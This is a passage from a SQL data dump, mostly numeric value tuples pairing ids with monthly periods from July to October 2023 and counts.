),(3273,1,'202307',3),(3282,1,'202307',3),(3287,1,'202307',3),(3430,1,'202307',3),(3479,1,'202307',3),(3531,1,'202307',3),(3771,1,'202307',3),(3774,1,'202307',3),(4329,1,'202307',3),(4357,1,'202307',3),(4440,1,'202307',3),(4546,1,'202307',3),(4582,1,'202307',3),(4651,1,'202307',3),(4691,1,'202307',3),(4694,1,'202307',3),(4741,1,'202307',3),(4744,1,'202307',3),(4753,1,'202307',3),(4756,1,'202307',3),(4792,1,'202307',3),(4797,1,'202307',3),(4988,1,'202307',3),(5020,1,'202307',3),(5050,1,'202307',3),(5101,1,'202307',3),(5140,1,'202307',3),(467,1,'202307',4),(478,1,'202307',4),(479,1,'202307',4),(485,1,'202307',4),(486,1,'202307',4),(1606,1,'202307',4),(1701,1,'202307',4),(1713,1,'202307',4),(1726,1,'202307',4),(1728,1,'202307',4),(1732,1,'202307',4),(1739,1,'202307',4),(2154,1,'202307',4),(2293,1,'202307',4),(2609,1,'202307',4),(2751,1,'202307',4),(2775,1,'202307',4),(2801,1,'202307',4),(2813,1,'202307',4),(3006,1,'202307',4),(3038,1,'202307',4),(3063,1,'202307',4),(3072,1,'202307',4),(3107,1,'202307',4),(3127,1,'202307',4),(3253,1,'202307',4),(3257,1,'202307',4),(3261,1,'202307',4),(3269,1,'202307',4),(3280,1,'202307',4),(3316,1,'202307',4),(3482,1,'202307',4),(3498,1,'202307',4),(3534,1,'202307',4),(3714,1,'202307',4),(3721,1,'202307',4),(3724,1,'202307',4),(3735,1,'202307',4),(3738,1,'202307',4),(4387,1,'202307',4),(4396,1,'202307',4),(4424,1,'202307',4),(4448,1,'202307',4),(4524,1,'202307',4),(4566,1,'202307',4),(4591,1,'202307',4),(4648,1,'202307',4),(4685,1,'202307',4),(4706,1,'202307',4),(4747,1,'202307',4),(4750,1,'202307',4),(4771,1,'202307',4),(4802,1,'202307',4),(4870,1,'202307',4),(5024,1,'202307',4),(5028,1,'202307',4),(5033,1,'202307',4),(5037,1,'202307',4),(5042,1,'202307',4),(5046,1,'202307',4),(5071,1,'202307',4),(5131,1,'202307',4),(5137,1,'202307',4),(483,1,'202307',5),(484,1,'202307',5),(1592,1,'202307',5),(1614,1,'202307',5),(1718,1,'202307',5),(1737,1,'202307',5),(1743,1,'202307',5),(1747,1,'202307',5),(1768,1,'202307',5),(1774,1,'202307',5),(2150,1,'202307',5),(2152,1,'202307',5),(2161,1,'202307',5),(2503,1,'202307',5),(2617,1,'202307',5),(2911,1,'202307',5),(2956,1,'202307',5),(2964,1,'202307',5),(3005,1,'202307',5),(3079,1,'202307',5),(3096,1,'202307',5),(3109,1,'202307',5),(3240,1,'202307',5),(3243,1,'202307',5),(3245,1,'202307',5),(3247,1,'202307',5),(3263,1,'202307',5),(3275,1,'202307',5),(3290,1,'202307',5),(3313,1,'202307',5),(3710,1,'202307',5),(3746,1,'202307',5),(3749,1,'202307',5),(4275,1,'202307',5),(4326,1,'202307',5),(4332,1,'202307',5),(4368,1,'202307',5),(4373,1,'202307',5),(4404,1,'202307',5),(4412,1,'202307',5),(4428,1,'202307',5),(4436,1,'202307',5),(4657,1,'202307',5),(4697,1,'202307',5),(4712,1,'202307',5),(4759,1,'202307',5),(4858,1,'202307',5),(4862,1,'202307',5),(4878,1,'202307',5),(4883,1,'202307',5),(4888,1,'202307',5),(4893,1,'202307',5),(4897,1,'202307',5),(4976,1,'202307',5),(4977,1,'202307',5),(4980,1,'202307',5),(4983,1,'202307',5),(5054,1,'202307',5),(5067,1,'202307',5),(5080,1,'202307',5),(5122,1,'202307',5),(5134,1,'202307',5),(335,1,'202307',6),(469,1,'202307',6),(480,1,'202307',6),(488,1,'202307',6),(1707,1,'202307',6),(2148,1,'202307',6),(2165,1,'202307',6),(2804,1,'202307',6),(3045,1,'202307',6),(3090,1,'202307',6),(3102,1,'202307',6),(3438,1,'202307',6),(3777,1,'202307',6),(4238,1,'202307',6),(4363,1,'202307',6),(4400,1,'202307',6),(4444,1,'202307',6),(4514,1,'202307',6),(4517,1,'202307',6),(4542,1,'202307',6),(4556,1,'202307',6),(4587,1,'202307',6),(4681,1,'202307',6),(4688,1,'202307',6),(4762,1,'202307',6),(5062,1,'202307',6),(5125,1,'202307',6),(5271,1,'202307',6),(471,1,'202307',7),(472,1,'202307',7),(473,1,'202307',7),(476,1,'202307',7),(487,1,'202307',7),(1604,1,'202307',7),(1722,1,'202307',7),(1745,1,'202307',7),(1770,1,'202307',7),(1778,1,'202307',7),(2159,1,'202307',7),(2297,1,'202307',7),(2989,1,'202307',7),(3092,1,'202307',7),(3226,1,'202307',7),(3307,1,'202307',7),(3489,1,'202307',7),(4301,1,'202307',7),(4341,1,'202307',7),(4416,1,'202307',7),(4660,1,'202307',7),(4703,1,'202307',7),(4768,1,'202307',7),(4776,1,'202307',7),(4866,1,'202307',7),(5146,1,'202307',7),(5256,1,'202307',7),(5264,1,'202307',7),(84,1,'202307',8),(474,1,'202307',8),(2457,1,'202307',8),(2658,1,'202307',8),(3004,1,'202307',8),(3117,1,'202307',8),(4323,1,'202307',8),(4335,1,'202307',8),(4391,1,'202307',8),(4529,1,'202307',8),(4677,1,'202307',8),(4700,1,'202307',8),(4765,1,'202307',8),(5153,1,'202307',8),(5157,1,'202307',8),(5268,1,'202307',8),(570,1,'202307',9),(1600,1,'202307',9),(1608,1,'202307',9),(1703,1,'202307',9),(4338,1,'202307',9),(4420,1,'202307',9),(4874,1,'202307',9),(4930,1,'202307',9),(5076,1,'202307',9),(74,1,'202307',10),(1544,1,'202307',10),(1724,1,'202307',10),(3781,1,'202307',10),(4674,1,'202307',10),(108,1,'202307',11),(1598,1,'202307',11),(3066,1,'202307',11),(3083,1,'202307',11),(4645,1,'202307',11),(4996,1,'202307',11),(5259,1,'202307',11),(5276,1,'202307',11),(468,1,'202307',12),(4520,1,'202307',12),(1612,1,'202307',13),(1766,1,'202307',13),(3030,1,'202307',13),(3060,1,'202307',13),(4454,1,'202307',13),(4457,1,'202307',13),(4722,1,'202307',13),(470,1,'202307',14),(1586,1,'202307',14),(2309,1,'202307',14),(2809,1,'202307',14),(4551,1,'202307',14),(4663,1,'202307',15),(4709,1,'202307',15),(1588,1,'202307',16),(5128,1,'202307',16),(5253,1,'202307',16),(76,1,'202307',17),(1610,1,'202307',17),(1596,1,'202307',18),(1602,1,'202307',18),(5163,1,'202307',18),(87,1,'202307',19),(2904,1,'202307',19),(68,1,'202307',20),(3764,1,'202307',21),(1582,1,'202307',23),(1594,1,'202307',24),(91,1,'202307',25),(89,1,'202307',26),(72,1,'202307',31),(80,1,'202307',70),(9,1,'202307',647),(1701,1,'202308',1),(1705,1,'202308',1),(1747,1,'202308',1),(1749,1,'202308',1),(1774,1,'202308',1),(1780,1,'202308',1),(2150,1,'202308',1),(2293,1,'202308',1),(2296,1,'202308',1),(3045,1,'202308',1),(3063,1,'202308',1),(3109,1,'202308',1),(3229,1,'202308',1),(3240,1,'202308',1),(3243,1,'202308',1),(3245,1,'202308',1),(3265,1,'202308',1),(3269,1,'202308',1),(3275,1,'202308',1),(3280,1,'202308',1),(3282,1,'202308',1),(3287,1,'202308',1),(3479,1,'202308',1),(3738,1,'202308',1),(3771,1,'202308',1),(4323,1,'202308',1),(4326,1,'202308',1),(4332,1,'202308',1),(4368,1,'202308',1),(4387,1,'202308',1),(4396,1,'202308',1),(4428,1,'202308',1),(4432,1,'202308',1),(4454,1,'202308',1),(4546,1,'202308',1),(4591,1,'202308',1),(4681,1,'202308',1),(4744,1,'202308',1),(4750,1,'202308',1),(4762,1,'202308',1),(4870,1,'202308',1),(4888,1,'202308',1),(4983,1,'202308',1),(1695,1,'202308',2),(1699,1,'202308',2),(1707,1,'202308',2),(1720,1,'202308',2),(1737,1,'202308',2),(1739,1,'202308',2),(1770,1,'202308',2),(1776,1,'202308',2),(2161,1,'202308',2),(2956,1,'202308',2),(2991,1,'202308',2),(3023,1,'202308',2),(3092,1,'202308',2),(3096,1,'202308',2),(3104,1,'202308',2),(3107,1,'202308',2),(3124,1,'202308',2),(3251,1,'202308',2),(3253,1,'202308',2),(3273,1,'202308',2),(3297,1,'202308',2),(3307,1,'202308',2),(3313,1,'202308',2),(3486,1,'202308',2),(3489,1,'202308',2),(3724,1,'202308',2),(3727,1,'202308',2),(3731,1,'202308',2),(3735,1,'202308',2),(3746,1,'202308',2),(3774,1,'202308',2),(3777,1,'202308',2),(4357,1,'202308',2),(4382,1,'202308',2),(4400,1,'202308',2),(4416,1,'202308',2),(4444,1,'202308',2),(4514,1,'202308',2),(4517,1,'202308',2),(4566,1,'202308',2),(4651,1,'202308',2),(4747,1,'202308',2),(4797,1,'202308',2),(4802,1,'202308',2),(4858,1,'202308',2),(4878,1,'202308',2),(4883,1,'202308',2),(4980,1,'202308',2),(106,1,'202308',3),(479,1,'202308',3),(480,1,'202308',3),(1697,1,'202308',3),(1713,1,'202308',3),(1730,1,'202308',3),(1732,1,'202308',3),(1734,1,'202308',3),(1743,1,'202308',3),(1772,1,'202308',3),(2148,1,'202308',3),(2152,1,'202308',3),(2165,1,'202308',3),(2178,1,'202308',3),(2248,1,'202308',3),(2252,1,'202308',3),(2297,1,'202308',3),(2704,1,'202308',3),(2804,1,'202308',3),(2813,1,'202308',3),(2964,1,'202308',3),(2989,1,'202308',3),(2993,1,'202308',3),(3006,1,'202308',3),(3041,1,'202308',3),(3072,1,'202308',3),(3079,1,'202308',3),(3097,1,'202308',3),(3117,1,'202308',3),(3127,1,'202308',3),(3247,1,'202308',3),(3257,1,'202308',3),(3261,1,'202308',3),(3263,1,'202308',3),(3271,1,'202308',3),(3285,1,'202308',3),(3316,1,'202308',3),(3430,1,'202308',3),(3438,1,'202308',3),(3531,1,'202308',3),(3541,1,'202308',3),(3714,1,'202308',3),(3749,1,'202308',3),(4238,1,'202308',3),(4329,1,'202308',3),(4373,1,'202308',3),(4404,1,'202308',3),(4408,1,'202308',3),(4542,1,'202308',3),(4551,1,'202308',3),(4582,1,'202308',3),(4587,1,'202308',3),(4612,1,'202308',3),(4654,1,'202308',3),(4657,1,'202308',3),(4660,1,'202308',3),(4668,1,'202308',3),(4685,1,'202308',3),(4709,1,'202308',3),(4712,1,'202308',3),(4741,1,'202308',3),(4756,1,'202308',3),(4759,1,'202308',3),(4765,1,'202308',3),(4771,1,'202308',3),(4792,1,'202308',3),(4862,1,'202308',3),(4866,1,'202308',3),(4893,1,'202308',3),(4897,1,'202308',3),(4988,1,'202308',3),(5067,1,'202308',3),(102,1,'202308',4),(471,1,'202308',4),(478,1,'202308',4),(484,1,'202308',4),(570,1,'202308',4),(1590,1,'202308',4),(1715,1,'202308',4),(1745,1,'202308',4),(2063,1,'202308',4),(2156,1,'202308',4),(2159,1,'202308',4),(2558,1,'202308',4),(2609,1,'202308',4),(2748,1,'202308',4),(2751,1,'202308',4),(2775,1,'202308',4),(2911,1,'202308',4),(3034,1,'202308',4),(3087,1,'202308',4),(3534,1,'202308',4),(3710,1,'202308',4),(3752,1,'202308',4),(4335,1,'202308',4),(4363,1,'202308',4),(4377,1,'202308',4),(4424,1,'202308',4),(4448,1,'202308',4),(4524,1,'202308',4),(4608,1,'202308',4),(4688,1,'202308',4),(4722,1,'202308',4),(4874,1,'202308',4),(5037,1,'202308',4),(5042,1,'202308',4),(5101,1,'202308',4),(476,1,'202308',5),(481,1,'202308',5),(485,1,'202308',5),(486,1,'202308',5),(1584,1,'202308',5),(1606,1,'202308',5),(1608,1,'202308',5),(1614,1,'202308',5),(1703,1,'202308',5),(1718,1,'202308',5),(1751,1,'202308',5),(2617,1,'202308',5),(2801,1,'202308',5),(3005,1,'202308',5),(3038,1,'202308',5),(3102,1,'202308',5),(3482,1,'202308',5),(4391,1,'202308',5),(4420,1,'202308',5),(4556,1,'202308',5),(4645,1,'202308',5),(4691,1,'202308',5),(4694,1,'202308',5),(4976,1,'202308',5),(5020,1,'202308',5),(5028,1,'202308',5),(5050,1,'202308',5),(5058,1,'202308',5),(5071,1,'202308',5),(5140,1,'202308',5),(5146,1,'202308',5),(5248,1,'202308',5),(5271,1,'202308',5),(469,1,'202308',6),(483,1,'202308',6),(488,1,'202308',6),(1604,1,'202308',6),(1724,1,'202308',6),(1726,1,'202308',6),(1741,1,'202308',6),(3004,1,'202308',6),(3060,1,'202308',6),(3498,1,'202308',6),(3742,1,'202308',6),(4697,1,'202308',6),(4703,1,'202308',6),(4753,1,'202308',6),(4768,1,'202308',6),(4776,1,'202308',6),(4977,1,'202308',6),(5046,1,'202308',6),(5062,1,'202308',6),(5122,1,'202308',6),(5125,1,'202308',6),(5268,1,'202308',6),(74,1,'202308',7),(468,1,'202308',7),(477,1,'202308',7),(482,1,'202308',7),(1709,1,'202308',7),(1711,1,'202308',7),(1722,1,'202308',7),(1728,1,'202308',7),(1766,1,'202308',7),(2658,1,'202308',7),(2965,1,'202308',7),(3066,1,'202308',7),(3083,1,'202308',7),(3090,1,'202308',7),(4663,1,'202308',7),(4706,1,'202308',7),(5024,1,'202308',7),(5033,1,'202308',7),(5054,1,'202308',7),(472,1,'202308',8),(487,1,'202308',8),(3030,1,'202308',8),(3069,1,'202308',8),(4301,1,'202308',8),(4338,1,'202308',8),(4412,1,'202308',8),(4529,1,'202308',8),(4677,1,'202308',8),(4996,1,'202308',8),(5131,1,'202308',8),(5134,1,'202308',8),(5137,1,'202308',8),(5153,1,'202308',8),(5253,1,'202308',8),(5256,1,'202308',8),(5259,1,'202308',8),(467,1,'202308',9),(470,1,'202308',9),(2769,1,'202308',9),(4436,1,'202308',9),(4520,1,'202308',9),(4674,1,'202308',9),(5080,1,'202308',9),(5163,1,'202308',9),(5276,1,'202308',9),(84,1,'202308',10),(473,1,'202308',10),(2309,1,'202308',10),(5076,1,'202308',10),(474,1,'202308',11),(2809,1,'202308',11),(5264,1,'202308',11),(1586,1,'202308',12),(2457,1,'202308',12),(4700,1,'202308',12),(5157,1,'202308',12),(108,1,'202308',13),(1592,1,'202308',13),(1600,1,'202308',13),(1602,1,'202308',13),(5128,1,'202308',13),(1544,1,'202308',14),(2503,1,'202308',14),(3781,1,'202308',14),(1582,1,'202308',15),(1588,1,'202308',15),(1598,1,'202308',15),(1612,1,'202308',15),(3764,1,'202308',15),(335,1,'202308',16),(1610,1,'202308',16),(4930,1,'202308',16),(87,1,'202308',17),(91,1,'202308',17),(1596,1,'202308',19),(76,1,'202308',22),(5280,1,'202308',22),(4457,1,'202308',23),(68,1,'202308',26),(2904,1,'202308',26),(89,1,'202308',27),(1594,1,'202308',33),(72,1,'202308',35),(80,1,'202308',66),(9,1,'202308',575),(1701,1,'202309',1),(1705,1,'202309',1),(1718,1,'202309',1),(1734,1,'202309',1),(1737,1,'202309',1),(1743,1,'202309',1),(1747,1,'202309',1),(1772,1,'202309',1),(1778,1,'202309',1),(1780,1,'202309',1),(2063,1,'202309',1),(2150,1,'202309',1),(2154,1,'202309',1),(2159,1,'202309',1),(2248,1,'202309',1),(2558,1,'202309',1),(2801,1,'202309',1),(2911,1,'202309',1),(2956,1,'202309',1),(2993,1,'202309',1),(3097,1,'202309',1),(3104,1,'202309',1),(3240,1,'202309',1),(3245,1,'202309',1),(3269,1,'202309',1),(3280,1,'202309',1),(3285,1,'202309',1),(3287,1,'202309',1),(3297,1,'202309',1),(3534,1,'202309',1),(3724,1,'202309',1),(3727,1,'202309',1),(3738,1,'202309',1),(3774,1,'202309',1),(4301,1,'202309',1),(4368,1,'202309',1),(4396,1,'202309',1),(4428,1,'202309',1),(4440,1,'202309',1),(4691,1,'202309',1),(4694,1,'202309',1),(4862,1,'202309',1),(4883,1,'202309',1),(4888,1,'202309',1),(5028,1,'202309',1),(5050,1,'202309',1),(1584,1,'202309',2),(1739,1,'202309',2),(1749,1,'202309',2),(1751,1,'202309',2),(1774,1,'202309',2),(1776,1,'202309',2),(2156,1,'202309',2),(2178,1,'202309',2),(2252,1,'202309',2),(2617,1,'202309',2),(2658,1,'202309',2),(2813,1,'202309',2),(2989,1,'202309',2),(2991,1,'202309',2),(3005,1,'202309',2),(3023,1,'202309',2),(3027,1,'202309',2),(3079,1,'202309',2),(3096,1,'202309',2),(3127,1,'202309',2),(3226,1,'202309',2),(3229,1,'202309',2),(3247,1,'202309',2),(3249,1,'202309',2),(3251,1,'202309',2),(3253,1,'202309',2),(3257,1,'202309',2),(3263,1,'202309',2),(3265,1,'202309',2),(3267,1,'202309',2),(3275,1,'202309',2),(3278,1,'202309',2),(3313,1,'202309',2),(3316,1,'202309',2),(3438,1,'202309',2),(3710,1,'202309',2),(3731,1,'202309',2),(3746,1,'202309',2),(3749,1,'202309',2),(3752,1,'202309',2),(4238,1,'202309',2),(4329,1,'202309',2),(4332,1,'202309',2),(4357,1,'202309',2),(4377,1,'202309',2),(4382,1,'202309',2),(4408,1,'202309',2),(4412,1,'202309',2),(4424,1,'202309',2),(4517,1,'202309',2),(4542,1,'202309',2),(4551,1,'202309',2),(4556,1,'202309',2),(4608,1,'202309',2),(4612,1,'202309',2),(4651,1,'202309',2),(4657,1,'202309',2),(4668,1,'202309',2),(4681,1,'202309',2),(4685,1,'202309',2),(4700,1,'202309',2),(4712,1,'202309',2),(4741,1,'202309',2),(4753,1,'202309',2),(4768,1,'202309',2),(4802,1,'202309',2),(4870,1,'202309',2),(4874,1,'202309',2),(4878,1,'202309',2),(5024,1,'202309',2),(5042,1,'202309',2),(5054,1,'202309',2),(5080,1,'202309',2),(5140,1,'202309',2),(471,1,'202309',3),(476,1,'202309',3),(479,1,'202309',3),(1604,1,'202309',3),(1695,1,'202309',3),(1697,1,'202309',3),(1703,1,'202309',3),(1711,1,'202309',3),(1713,1,'202309',3),(1726,1,'202309',3),(1728,1,'202309',3),(1768,1,'202309',3),(1770,1,'202309',3),(1782,1,'202309',3),(2152,1,'202309',3),(2161,1,'202309',3),(2165,1,'202309',3),(2293,1,'202309',3),(2296,1,'202309',3),(2297,1,'202309',3),(2609,1,'202309',3),(2704,1,'202309',3),(2769,1,'202309',3),(2775,1,'202309',3),(2965,1,'202309',3),(3006,1,'202309',3),(3041,1,'202309',3),(3045,1,'202309',3),(3063,1,'202309',3),(3109,1,'202309',3),(3243,1,'202309',3),(3259,1,'202309',3),(3290,1,'202309',3),(3307,1,'202309',3),(3482,1,'202309',3),(3498,1,'202309',3),(3531,1,'202309',3),(3541,1,'202309',3),(3742,1,'202309',3),(3771,1,'202309',3),(3777,1,'202309',3),(4275,1,'202309',3),(4323,1,'202309',3),(4400,1,'202309',3),(4514,1,'202309',3),(4546,1,'202309',3),(4582,1,'202309',3),(4587,1,'202309',3),(4591,1,'202309',3),(4654,1,'202309',3),(4660,1,'202309',3),(4688,1,'202309',3),(4709,1,'202309',3),(4722,1,'202309',3),(4744,1,'202309',3),(4750,1,'202309',3),(4756,1,'202309',3),(4897,1,'202309',3),(4980,1,'202309',3),(5058,1,'202309',3),(5067,1,'202309',3),(5101,1,'202309',3),(5125,1,'202309',3),(5248,1,'202309',3),(102,1,'202309',4),(480,1,'202309',4),(482,1,'202309',4),(485,1,'202309',4),(1707,1,'202309',4),(1715,1,'202309',4),(1741,1,'202309',4),(1745,1,'202309',4),(2748,1,'202309',4),(2751,1,'202309',4),(3004,1,'202309',4),(3092,1,'202309',4),(3102,1,'202309',4),(3117,1,'202309',4),(3261,1,'202309',4),(3273,1,'202309',4),(3430,1,'202309',4),(3714,1,'202309',4),(4326,1,'202309',4),(4335,1,'202309',4),(4341,1,'202309',4),(4387,1,'202309',4),(4420,1,'202309',4),(4454,1,'202309',4),(4566,1,'202309',4),(4648,1,'202309',4),(4765,1,'202309',4),(4983,1,'202309',4),(4988,1,'202309',4),(5046,1,'202309',4),(5062,1,'202309',4),(5071,1,'202309',4),(5131,1,'202309',4),(5146,1,'202309',4),(5153,1,'202309',4),(5157,1,'202309',4),(477,1,'202309',5),(483,1,'202309',5),(486,1,'202309',5),(488,1,'202309',5),(1614,1,'202309',5),(1722,1,'202309',5),(3069,1,'202309',5),(3072,1,'202309',5),(3479,1,'202309',5),(3486,1,'202309',5),(3489,1,'202309',5),(3721,1,'202309',5),(3735,1,'202309',5),(4444,1,'202309',5),(4759,1,'202309',5),(4771,1,'202309',5),(4866,1,'202309',5),(478,1,'202309',6),(481,1,'202309',6),(487,1,'202309',6),(570,1,'202309',6),(1590,1,'202309',6),(1608,1,'202309',6),(1724,1,'202309',6),(2148,1,'202309',6),(3090,1,'202309',6),(3107,1,'202309',6),(4697,1,'202309',6),(4747,1,'202309',6),(4776,1,'202309',6),(5037,1,'202309',6),(108,1,'202309',7),(469,1,'202309',7),(470,1,'202309',7),(472,1,'202309',7),(1606,1,'202309',7),(1766,1,'202309',7),(2804,1,'202309',7),(4391,1,'202309',7),(4663,1,'202309',7),(4706,1,'202309',7),(4762,1,'202309',7),(5122,1,'202309',7),(5259,1,'202309',7),(473,1,'202309',8),(474,1,'202309',8),(484,1,'202309',8),(3124,1,'202309',8),(4416,1,'202309',8),(4524,1,'202309',8),(4529,1,'202309',8),(4645,1,'202309',8),(4674,1,'202309',8),(4977,1,'202309',8),(4996,1,'202309',8),(5137,1,'202309',8),(5256,1,'202309',8),(468,1,'202309',9),(2809,1,'202309',9),(4520,1,'202309',9),(4703,1,'202309',9),(5076,1,'202309',9),(5134,1,'202309',9),(84,1,'202309',10),(87,1,'202309',10),(3030,1,'202309',10),(4338,1,'202309',10),(4677,1,'202309',10),(4976,1,'202309',10),(5268,1,'202309',10),(5271,1,'202309',10),(74,1,'202309',11),(4930,1,'202309',11),(5033,1,'202309',11),(5128,1,'202309',11),(5253,1,'202309',11),(5264,1,'202309',11),(467,1,'202309',12),(2309,1,'202309',12),(2457,1,'202309',12),(3066,1,'202309',12),(4436,1,'202309',12),(5276,1,'202309',12),(1544,1,'202309',13),(1588,1,'202309',13),(1592,1,'202309',13),(1598,1,'202309',13),(1600,1,'202309',13),(1610,1,'202309',13),(3060,1,'202309',13),(2503,1,'202309',14),(3764,1,'202309',15),(3781,1,'202309',15),(5280,1,'202309',16),(91,1,'202309',17),(4457,1,'202309',17),(335,1,'202309',18),(1582,1,'202309',18),(1602,1,'202309',18),(2904,1,'202309',19),(3083,1,'202309',19),(1586,1,'202309',20),(68,1,'202309',21),(1612,1,'202309',23),(1596,1,'202309',24),(76,1,'202309',25),(1594,1,'202309',25),(89,1,'202309',27),(5163,1,'202309',29),(72,1,'202309',34),(80,1,'202309',78),(9,1,'202309',632),(1590,1,'202310',2),(1703,1,'202310',2),(1709,1,'202310',2),(1732,1,'202310',2),(1751,1,'202310',2),(1770,1,'202310',2),(3090,1,'202310',2),(3092,1,'202310',2),(3096,1,'202310',2),(3240,1,'202310',2),(3271,1,'202310',2),(3273,1,'202310',2),(3278,1,'202310',2),(3287,1,'202310',2),(3735,1,'202310',2),(3749,1,'202310',2),(4357,1,'202310',2),(4368,1,'202310',2),(4382,1,'202310',2),(4404,1,'202310',2),(4556,1,'202310',2),(4587,1,'202310',2),(4712,1,'202310',2),(4744,1,'202310',2),(4750,1,'202310',2),(4858,1,'202310',2),(4870,1,'202310',2),(4883,1,'202310',2),(4976,1,'202310',2),(106,1,'202310',3),(110,1,'202310',3),(469,1,'202310',3),(1695,1,'202310',3),(1697,1,'202310',3),(1701,1,'202310',3),(1718,1,'202310',3),(1720,1,'202310',3),(1741,1,'202310',3),(1780,1,'202310',3),(2150,1,'202310',3),(2154,1,'202310',3),(2156,1,'202310',3),(2161,1,'202310',3),(2178,1,'202310',3),(2296,1,'202310',3),(2704,1,'202310',3),(2964,1,'202310',3),(3087,1,'202310',3),(3109,1,'202310',3),(3124,1,'202310',3),(3229,1,'202310',3),(3251,1,'202310',3),(3259,1,'202310',3),(3265,1,'202310',3),(3269,1,'202310',3),(3275,1,'202310',3),(3282,1,'202310',3),(3489,1,'202310',3),(3531,1,'202310',3),(3541,1,'202310',3),(3721,1,'202310',3),(3727,1,'202310',3),(3746,1,'202310',3),(4428,1,'202310',3),(4432,1,'202310',3),(4514,1,'202310',3),(4524,1,'202310',3),(4546,1,'202310',3),(4694,1,'202310',3),(4756,1,'202310',3),(4759,1,'202310',3),(4797,1,'202310',3),(4802,1,'202310',3),(4862,1,'202310',3),(4866,1,'202310',3),(4897,1,'202310',3),(5028,1,'202310',3),(5037,1,'202310',3),(5042,1,'202310',3),(5058,1,'202310',3),(5071,1,'202310',3),(5153,1,'202310',3),(102,1,'202310',4),(485,1,'202310',4),(1707,1,'202310',4),(1711,1,'202310',4),(1713,1,'202310',4),(1734,1,'202310',4),(1737,1,'202310',4),(1739,1,'202310',4),(1774,1,'202310',4),(1776,1,'202310',4),(2063,1,'202310',4),(2165,1,'202310',4),(2248,1,'202310',4),(2252,1,'202310',4),(2609,1,'202310',4),(2658,1,'202310',4),(2775,1,'202310',4),(2813,1,'202310',4),(2965,1,'202310',4),(3006,1,'202310',4),(3027,1,'202310',4),(3041,1,'202310',4),(3063,1,'202310',4),(3097,1,'202310',4),(3102,1,'202310',4),(3104,1,'202310',4),(3107,1,'202310',4),(3127,1,'202310',4),(3226,1,'202310',4),(3243,1,'202310',4),(3245,1,'202310',4),(3247,1,'202310',4),(3249,1,'202310',4),(3253,1,'202310',4),(3263,1,'202310',4),(3280,1,'202310',4),(3290,1,'202310',4),(3316,1,'202310',4),(3430,1,'202310',4),(3438,1,'202310',4),(3479,1,'202310',4),(3710,1,'202310',4),(3724,1,'202310',4),(3738,1,'202310',4),(4373,1,'202310',4),(4377,1,'202310',4),(4387,1,'202310',4),(4396,1,'202310',4),(4408,1,'202310',4),(4412,1,'202310',4),(4440,1,'202310',4),(4448,1,'202310',4),(4529,1,'202310',4),(4566,1,'202310',4),(4591,1,'202310',4),(4668,1,'202310',4),(4685,1,'202310',4),(4691,1,'202310',4),(4697,1,'202310',4),(4703,1,'202310',4),(4753,1,'202310',4),(4768,1,'202310',4),(4792,1,'202310',4),(4888,1,'202310',4),(5020,1,'202310',4),(5024,1,'202310',4),(5046,1,'202310',4),(5050,1,'202310',4),(5054,1,'202310',4),(5080,1,'202310',4),(5125,1,'202310',4),(5140,1,'202310',4),(5157,1,'202310',4),(5248,1,'202310',4),(471,1,'202310',5),(477,1,'202310',5),(478,1,'202310',5),(479,1,'202310',5),(481,1,'202310',5),(483,1,'202310',5),(486,1,'202310',5),(1715,1,'202310',5),(1726,1,'202310',5),(1743,1,'202310',5),(1749,1,'202310',5),(1768,1,'202310',5),(1772,1,'202310',5),(1778,1,'202310',5),(1782,1,'202310',5),(2152,1,'202310',5),(2558,1,'202310',5),(2617,1,'202310',5),(2751,1,'202310',5),(2989,1,'202310',5),(2993,1,'202310',5),(3045,1,'202310',5),(3257,1,'202310',5),(3267,1,'202310',5),(3297,1,'202310',5),(3307,1,'202310',5),(3482,1,'202310',5),(3714,1,'202310',5),(3742,1,'202310',5),(3774,1,'202310',5),(4275,1,'202310',5),(4326,1,'202310',5),(4341,1,'202310',5),(4444,1,'202310',5),(4582,1,'202310',5),(4648,1,'202310',5),(4657,1,'202310',5),(4681,1,'202310',5),(4688,1,'202310',5),(4741,1,'202310',5),(4771,1,'202310',5),(4874,1,'202310',5),(4980,1,'202310',5),(4983,1,'202310',5),(4988,1,'202310',5),(5062,1,'202310',5),(5131,1,'202310',5),(5146,1,'202310',5),(472,1,'202310',6),(476,1,'202310',6),(480,1,'202310',6),(1584,1,'202310',6),(1606,1,'202310',6),(1614,1,'202310',6),(1705,1,'202310',6),(1722,1,'202310',6),(1730,1,'202310',6),(1747,1,'202310',6),(2748,1,'202310',6),(2769,1,'202310',6),(2801,1,'202310',6),(2991,1,'202310',6),(3004,1,'202310',6),(3005,1,'202310',6),(3023,1,'202310',6),(3034,1,'202310',6),(3072,1,'202310',6),(3079,1,'202310',6),(3285,1,'202310',6),(3313,1,'202310',6),(3486,1,'202310',6),(3498,1,'202310',6),(3731,1,'202310',6),(3752,1,'202310',6),(3771,1,'202310',6),(3777,1,'202310',6),(4329,1,'202310',6),(4332,1,'202310',6),(4363,1,'202310',6),(4400,1,'202310',6),(4420,1,'202310',6),(4424,1,'202310',6),(4517,1,'202310',6),(4651,1,'202310',6),(4654,1,'202310',6),(4747,1,'202310',6),(4762,1,'202310',6),(4776,1,'202310',6),(4878,1,'202310',6),(4893,1,'202310',6),(4977,1,'202310',6),(4996,1,'202310',6),(5067,1,'202310',6),(5122,1,'202310',6),(5137,1,'202310',6),(5271,1,'202310',6),(473,1,'202310',7),(482,1,'202310',7),(488,1,'202310',7),(1745,1,'202310',7),(1766,1,'202310',7),(2148,1,'202310',7),(2159,1,'202310',7),(2293,1,'202310',7),(2457,1,'202310',7),(2503,1,'202310',7),(2956,1,'202310',7),(3038,1,'202310',7),(3060,1,'202310',7),(3117,1,'202310',7),(3261,1,'202310',7),(4391,1,'202310',7),(4416,1,'202310',7),(4542,1,'202310',7),(4765,1,'202310',7),(5264,1,'202310',7),(5268,1,'202310',7),(74,1,'202310',8),(468,1,'202310',8),(484,1,'202310',8),(1592,1,'202310',8),(1604,1,'202310',8),(1699,1,'202310',8),(2804,1,'202310',8),(3534,1,'202310',8),(4238,1,'202310',8),(4301,1,'202310',8),(4612,1,'202310',8),(4660,1,'202310',8),(4677,1,'202310',8),(5134,1,'202310',8),(487,1,'202310',9),(1598,1,'202310',9),(2911,1,'202310',9),(3066,1,'202310',9),(3781,1,'202310',9),(5033,1,'202310',9),(5101,1,'202310',9),(467,1,'202310',10),(570,1,'202310',10),(4323,1,'202310',10),(4335,1,'202310',10),(4436,1,'202310',10),(4700,1,'202310',10),(5076,1,'202310',10),(470,1,'202310',11),(1544,1,'202310',11),(1600,1,'202310',11),(1608,1,'202310',11),(3030,1,'202310',11),(3069,1,'202310',11),(4338,1,'202310',11),(4608,1,'202310',11),(4645,1,